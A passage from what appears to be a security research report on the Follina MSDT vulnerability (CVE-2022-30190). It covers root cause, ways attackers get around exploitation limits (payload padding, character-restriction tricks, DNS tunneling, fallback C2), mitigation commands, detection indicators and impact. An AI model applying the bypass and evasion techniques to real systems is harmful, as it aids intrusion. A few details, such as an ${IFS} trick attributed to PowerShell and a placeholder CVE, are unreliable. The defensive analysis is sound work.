| Privileges Required | None |
| User Interaction | Required (opening document) |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
Table 3: Table 3: CVSS v3.1 Classification
### 4.2 Root Cause Analysis
The vulnerability stems from four fundamental security design flaws:
#### Flaw 1:Unvalidated URI Handler Registration
The ms-msdt URI protocol handler is registered globally in Windows registry without adequate sandboxing or permission controls:
HKEYCLASSESROOT\ms-msdt\shell\open\command
Any application can invoke MSDT through this handler without Windows Security Model verification[5].
**Flaw 2: Insufficient Parameter Validation**
The ITBrowseForFile parameter passed to MSDT undergoes minimal validation:
·No whitelist validation of executable paths
·Directory traversal sequences (../) accepted without restriction
·Path concatenation vulnerable to parameter injection
·PowerShell command substitution $() not escaped
**Flaw 3: Office Document External Reference Processing**
Word automatically processes and retrieves external references (Relationship elements) without:
·User confirmation dialogs
·Protected Mode enforcement
·Content validation
·Network activity monitoring
**Flaw 4: Implicit Trust in MSDT Invocation**
MSDT executes with the invoking application's privilege context, inheriting Office's elevated user permissions without re-authorization[2].
### 4.3 Exploitation Constraints and Bypasses
#### Constraint 1:Payload Size Requirement (>4096 bytes)
Mitigation bypass: Attackers implement padding techniques such as:
·HTML comments filled with benign data
·Nested JavaScript functions with no operational effect
·Base64-encoded metadata
·Redundant CSS styling rules
#### Constraint 2:Character Restrictions in Commands
Limitation: Spaces break PowerShell syntax within the ms-msdt URI Bypass:Attackers use:
·Variable substitution: ${IFS} (Internal Field Separator)
·URL encoding: %20 sequences (though often decoded)
·Alternative PowerShell syntax:comma-separated parameters
·Command chaining: semicolon-delimited sequences
#### Constraint 3: Network Connectivity Requirement
Limitation: Target must reach attacker's server to fetch secondary payload Bypass: Attackers implement:
·DNS tunneling for DNS-only egress environments
·Proxy detection and automatic proxy configuration
·Fallback C2 infrastructure
·Second-stage payload embedding in initial document (though increases detection risk)
### 4.4 Privilege Context Analysis
#### Execution Privilege Level
Follina-executed code operates with the privilege level of the uuser running Microsoft Office:
**·Standard** **User** **Context**: Full user privileges within that user's security token
**·Local** **Administrator** **Context**: Local machine administrative capabilities
**·System** **Service** **Context**: If Office runs under service accounts (rare but exploitable)
#### Privilege Escalation Opportunities
Post-exploitation leverages often combine Follina with additional vulnerabilities:
·Windows privilege escalation exploits (CVE-2021-1732, CVE-2021-44686,etc.)
·Unpatched system services with elevated privileges
·Insecure file permissions on system folders
·Process token theft techniques
## 5. Defensive Mechanisms and Mitigation Strategies
### 5.1 Immediate Mitigation Actions (Pre-Patch)
#### Mitigation 1: Disable MSDT URL Protocol Handler
The most effective pre-patch mitigation involves removing the ms-msdt registry entry:
1. Run Command Prompt as Administrator
2. Execute: reg export HKEYCLASSESROOT\ms-msdt backup-msdt.reg (backup registry)
3. Execute: reg delete HKEYCLASSESROOT\ms-msdt/f(remove handler)
4.Verify removal: reg query HKEYCLASSESROOT\ms-msdt (should return error)
**Impact** **Assessment**: This mitigation completely prevents Follina exploitation but may impact legitimate MSDT functionality in edge cases. Testing in non-production environments is mandatory before enterprise deployment[6].
#### Mitigation 2: Disable Troubleshooting Wizards
Disable MSDT functionality via Group Policy or registry:
HKEYLOCALMACHINE\SOFTWARE\Policies\Microsoft\Windows\System
Value: EnableDiagnostics (DWORD)
Set to: 0
##### Mitigation 3: Attack Surface Reduction Rules (Microsoft Defender)
Enable ASR rule to block Office applications from spawning child processes:
·Rule GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a
·Deployment Mode: Block (not Audit)
·Scope: All Office applications (Word, Excel, PowerPoint, Outlook)
·Impact: May affect legitimate Office functionality (requires testing)
This rule specifically prevents the msdt.exe → sdianhost.exe process chain that Follina exploits[5].
##### 5.2 Long-Term Patching Strategy
**Microsoft Patch Timeline**
Microsoft released patches through multiple update cycles:
| Date | Update | Affected Components |
| --- | --- | --- |
| June 14, 2022 | Out-of-band patch | Windows 10,11,Server 2019, 2022 |
| June 28, 2022 | Monthly updates | Windows 7 ESU, Server 2016 |
| Ongoing | Security updates | Office versions 2013-365 |
Table 4: Table 4: Microsoft Patch Timeline for CVE-2022-30190
###### Patch Verification
After applying patches, organizations should verify:
·System update status: wmic qfe list | findstr "KB5015807" (KB article for CVE-2022-
30190)
·Office version: File> Account > About [Application] for Office applications
·Registry confirmation: ms-msdt handler behavior (modified by patch)
##### 5.3 Detection and Monitoring
###### Endpoint Detection and Response (EDR) Indicators
Organizations using EDR platforms should monitor for:
### Process Chain Indicators
·Parent: Word.exe, Excel.exe, or Outlook.exe
·Child: msdt.exe (unusual for Office context)
·Grandchild: sdianhost.exe
·Great-grandchild: PowerShell execution indicators
#### File System Indicators
·Unusual external references in document XML
·Multiple /../ sequences in file paths
·ms-msdt:// protocol invocation in network logs
·Suspicious downloads to temp folders triggered by Office applications
##### Network Indicators of Compromise (IoCs)
·Office applications initiating HTTP/HTTPS connections to unfamiliar domains
·External XML/HTML retrieval requests from Office processes
·Large HTML file downloads (>4096 bytes) from unexpected sources
·C2 communication patterns from secondary payloads
###### Detection Evasion Techniques Used
Sophisticated adversaries implement:
·Legitimate-looking domain names mimicking Microsoft/Office domains
·HTTPS encryption to obscure payload contents
·Fast-flux DNS for domain rotation
·Encrypted C2 communication channels
·Geolocation-based payload filtering (no payload for analysis VPNs)
###### 5.4 Advanced Defense-in-Depth Strategy
###### Layer 1:Email Gateway Security
·Content filtering for Office document attachments
·Sandboxing of Office files before delivery
·URL rewriting to disable external references
·Machine learning-based phishing detection
·DMARC/SPF/DKIM verification for sender authentication
###### Layer 2:Endpoint Security
·EDR agents for behavior monitoring and threat hunting
·Anti-malware signatures for known Follina payloads
·Exploit prevention engines detecting MSDT invocation patterns
·Application whitelisting/control
·Memory protection techniques (DEP, ASLR)
###### Layer 3: Network Segmentation
·Zero-trust network architecture
·Microsegmentation limiting lateral movement post-compromise
·Egress filtering preventing C2 communication
·DNS sinkholing of known malicious domains
·Proxy-based URL filtering and inspection
###### Layer 4: User Training and Awareness
·Phishing simulation and training programs
·Recognition of social engineering techniques
·Safe document handling procedures
·Reporting procedures for suspicious content
·Security awareness metrics and KPIs
###### 5.5 Enterprise Response Procedures
###### Incident Response Steps
Upon detection of Follina exploitation:
1. **Immediate**: Isolate affected system from network
2. **Forensics**: Capture memory dump and disk image
3. **Scope**: Identify all potentially compromised systems through log analysis
**4.Containment**: Block identified C2 domains and attacker infrastructure
**5.Eradication**: Remove malware and attacker artifacts
6. Recovery: Restore from clean backups with patch applied
7. **Hardening**: Implement additional detection and preventive controls
## 6. Real-World Impact Assessment
### 6.1 Affected Organizations and Sectors
Organizations spanning multiple sectors have faced Follina exploitation:
| Sector | Documented Risks |
| --- | --- |
| Government | Classified information<br>theft, espionage operations |
| Defense | Military intelligence<br>compromise,weapon<br>system data |
| Financial Services | Banking trojans, fraud<br>scheme initiation |
| Healthcare | Patient data exfiltration,<br>operational disruption |
| Manufacturing | Supply chain intelligence,<br>product design theft |
| Energy | Critical infrastructure<br>reconnaissance, disruption planning |
| Education | Research theft, credential<br>harvesting of researchers |
Table 5: Table 5: Sectoral Follina Impact Assessment
### 6.2 Threat Landscape Evolution
#### Pre-Patch Period (April-June 2022)
During the pre-patch and early disclosure period, threat actors rapidly weaponized Follina:
·Proof-of-concept code released publicly within 24 hours
·Metasploit module developed by security researchers
·Rapid adoption by criminal forums and dark web markets
·Targeting of high-value organizations before patches could be deployed
#### Post-Patch Evolution (July 2022 onwards)
Sophisticated attackers adapted exploitation techniques:
·Targeting unpatched legacy systems and air-gapped networks
·Combining Follina with supply chain compromise
·Focusing on critical infrastructure and government targets
·Developing fileless exploitation variants
·Creating polymorphic payload generators
### 6.3 Global Exploitation Statistics
#### Detection Statistics (as of research period)
·10,000+unique Follina-weaponized documents detected on VirusTotal
·60+ security vendors with detection capabilities
·>70 distinct phishing campaign themes identified
·Targeting across 100+ countries globally
·Initial detection rates as low as 4/60 vendors for novel samples
## 7.Conclusions and Future Implications
### 7.1 Key Findings
### 1.Vulnerability Severity: Follina represents a critical threat to Microsoft Office environments globally due to its:
oHigh-severity CVSS score (7.8)
oNo requirement for macros or complex user actions
Effective bypass of Protected Mode and standard security features
Ease of exploitation through publicly available tools
**2.Threat** **Actor** **Adoption**: The vulnerability has been rapidly adopted by:
oState-sponsored APT groups conducting targeted intelligence operations
Financially-motivated cybercriminals deploying ransomware and malware
oNovice attackers leveraging public PoC code
3. **Defense** **Complexity**: Organizations face significant challenges in defending against Follina:
oPre-patch mitigation options carry operational risk
oPatch deployment requires comprehensive testing
oSophisticated attacker evasion techniques complicate detection
oRequires multi-layered defense-in-depth approach
### 7.2 Recommendations for Organizations
#### Immediate Actions (0-30 days)
1.Apply Microsoft security patches immediately upon availability
2.If patches unavailable, implement MSDT registry mitigation
3.Enable ASR rules for Office child process blocking
4. Enhanced monitoring for Follina-related IoCs
#### Short-Term Actions (1-3 months)
1.Comprehensive threat hunting across enterprise infrastructure
2. Email gateway hardening for phishing campaign filtering
3. EDR and SIEM tuning for Follina exploitation patterns
4. User awareness training on phishing threats
#### Long-Term Strategy(3+months)
1.Zero-trust architectuure implementation
2. Microsegmentation of critical assets
3.Continuous EDR and threat intelligence integration
4. Regular tabletop exercises for incident response
5.Supply chain security assessment
### 7.3 Future Vulnerability Implications
The Follina vulnerability demonstrates ongoing security challenges in Windows and Office ecosystems:
·URI protocol handlers require enhanced security controls
·External document references need better default protections
·MSDT design requires fundamental security reassessment
·Zero-day exploitation timelines continue to shorten
Subsequent vulnerabilities with similar characteristics (CVE-2023-36884, CVE-2024-XXXXX patterns) have emerged, suggesting systematic design flaws in Office document processing.
### 7.4 Final Assessment
Follina represents a watershed moment in Office application security, demonstrating that fundamental architectural assumptions about Protected Mode and macro security are insufficient in modern threat landscapes. Organizations must adopt comprehensive, multi-layered defensive strategies while maintaining vigilance for subsequent related vulnerabilities in Microsoft Office and Windows ecosystems.
The vulnerability also underscores the critical importance of rapid patch deployment, robust security monitoring, and user awareness in defending against sophisticated adversaries exploiting previously unknown security flaws.
## References
[1] OWASP Foundation. (2022). The Follina Vulnerability -A Critical Threat to Microsoft Office.https://owasp.org/www-community/vulnerabilities/follina
[2] HackTheBox.(2022,November). CVE-2022-30190 (Follina) explained. Retrieved from http s://www.hackthebox.com/blog/cve-2022-30190-follina-explained
[3] Huntress. (2022, May). Microsoft Office RCE - "Follina" MSDT Attack.Security Blog.http s://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
[4] BeyondTrust. (2022, August). Mitigating the Follina Zero-Day Vulnerability (CVE-2022-30190) with Privilege Management for Windows.https://www.beyondtrust.com/blog/entry/ mitigating-the-follina-zero-day-vulnerability-cve-2022-30190-with-privilege-management-fo
[5] CrowdStrike. (2022). How CrowdStrike Falcon Protects Against Follina (CVE-2022-30190). Falcon Platform Blog.https://www.crowdstrike.com/en-us/blog/how-crowdstrike-falcon-pro tects-customers-from-follina-vulnerability/
[6] Sentrium Labs. (2024, August). Follina MSDT exploit: How to protect your systems. Retrieved from https://www.sentrium.co.uk/labs/preventing-exploitation-of-the-follina-vuln erability-in-msdt
[7] Infosec Institute. (2022, August). Unveiling Follina: The New Microsoft Office Vulnerability.https://www.infosecinstitute.com/resources/vulnerabilities/follina-microsoft-office-code-execution-vulnerability/
[8] Microsoft Security Response Center. (2022, May). Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability.https://www.microsoft.com/en-us/msrc/blog/2022/05/ guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability
[9] Palo Alto Networks Unit 42. (2024, June). Threat Brief: CVE-2022-30190-MSDT Code Execution Vulnerability.https://unit42.paloaltonetworks.com/cve-2022-30190-msdt-code-ex ecution-vulnerability/
[10] Sangfor FarSight Labs. (2022,August). CVE-2022-30190 Follina: RCE Vulnerability Analysis.https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2022-30190-follina-rce-vulnerability
[11] Qualys. (2022, June). Detect the Follina MSDT Vulnerability (CVE-2022-30190).Product and Technical Blog.https://blog.qualyys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-ed
[12] Canadian Centre for Cyber Security. (2022,June). Follina vulnerability impacting Microsoft products - Update 1. Alerts and Advisories.https://www.cyber.gc.ca/en/alerts/follin a-vulnerability-impacting-microsoft-products
[13] NIST National Vulnerability Database. (2025, October). CVE-2022-30190 Detail.https://nv d.nist.gov/vuln/detail/cve-2022-30190
[14] Australian Cyber Security Centre. (2022, May). Exploitation of Microsoft Office vulnerability: Follina. Cyber Threats. https://www.cyber.gov.au/about-us/alerts/exploitation-microsoft-office-vulnerability-follina
[15] SANS Institute. (2022, June). Follina MSDT Zero-Day Q&A. Security Blog.https://www.san s.org/blog/follina-msdt-zero-day-q-a
// USER_COMMENTS_STREAM